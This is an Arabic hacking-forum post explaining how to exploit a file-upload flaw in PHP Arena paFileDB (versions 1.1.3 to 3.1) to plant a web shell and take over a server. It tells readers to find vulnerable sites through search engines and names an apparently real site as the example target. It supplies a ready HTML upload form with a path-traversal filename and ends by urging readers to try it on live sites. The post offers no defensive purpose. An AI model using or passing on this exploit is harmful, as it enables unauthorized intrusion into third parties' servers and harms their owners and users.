ثغرة لاختراق سيرفر !!!!!
بسم الله الرحمن الرحيم
شرح ثغرة
PHP Arena paFileDB
وأستغلالها.
============
الثغرة تمكنك من رفع أي ملف على الموقع وبذلك نستطيع رفع شيل على الموقع وأختراق السيرفر بالكامل.
============
(البرامج المصابه)
PHP Arena paFileDB 1.1.3
PHP Arena paFileDB 2.1.1
PHP Arena paFileDB 3.0 Beta 3.1
PHP Arena paFileDB 3.0
PHP Arena paFileDB 3.1
============
أذهب إلى أي محرك بحث منثل جوجل
وأكتب أيا من البرامج السابقة مثلا:
PHP Arena paFileDB 3.1
راح تطلع لنا مواقع كثيرة نختار منها على سبيل المثال:
http://www.truez.com/download
نضيف عليه هالوصلة:
includes/team/file.php
ليصبح:
http://www.truez.com/download/includes/team/file.php
الأن ضع اللنك في المتصفح وأضغط أنتر:
إذا طلع لك هكذا
[ ] - [ ] - [ ]
يعني الموقع مصاب بالثغرة.
الأن لرفع ملف إلى الموقع نتبع الخطوات التالية:
1- نعمل مجلد على القرص C: ونسميه مثلا: Virus
2- الأن نضع بداخله الملف المراد نقله على الموقع ونسميه مثلا 777.php
3- الأن ننسخ هذا الكود ونضعه بملف txt ثم عند الحفظ نسميه Virus.html:
======================
<html><body>
<form ENCTYPE="multipart/form-data" method="POST" action="http://www.truez.com/download/includes/team/file.php">
<input name="userfile" TYPE="file"><br>
<input name="userfile_name" TYPE="text" value="../../../uploads/777.php"><br>
<input type="hidden" name="action" value="team">
<input type="hidden" name="tm" value="file">
<input type="hidden" name="file" value="upload">
<input type="hidden" name="upload" value="do">
<input type=submit name=submit value="doit">
</form>
</body></html>
======================
مع مراعاة تغيير:
http://www.truez.com/download/includes/team/file.php
إلى الموقع المصاب.
و
777.php
إلى إسم الملف (أتركه كما هو لأنه نحن غيرنا أسمه إلى (777
4- الأن أفتح الصفحة بالمستعرض Internet Explorer وفي الفراغ الأول أختار الملف 777.php الذي كنا نريد ترفيعه ثم أضغط على doit عندها سينتقل الملف إلى الموقع عن طريق الثغرة.
ويمكننا أستعراضه من هذا اللنك:
http://www.truez.com/download/uploads/777.php
جربوا واخبرونا
__________________
fmfm
-----------------------------------------------------
|
العرض العادي
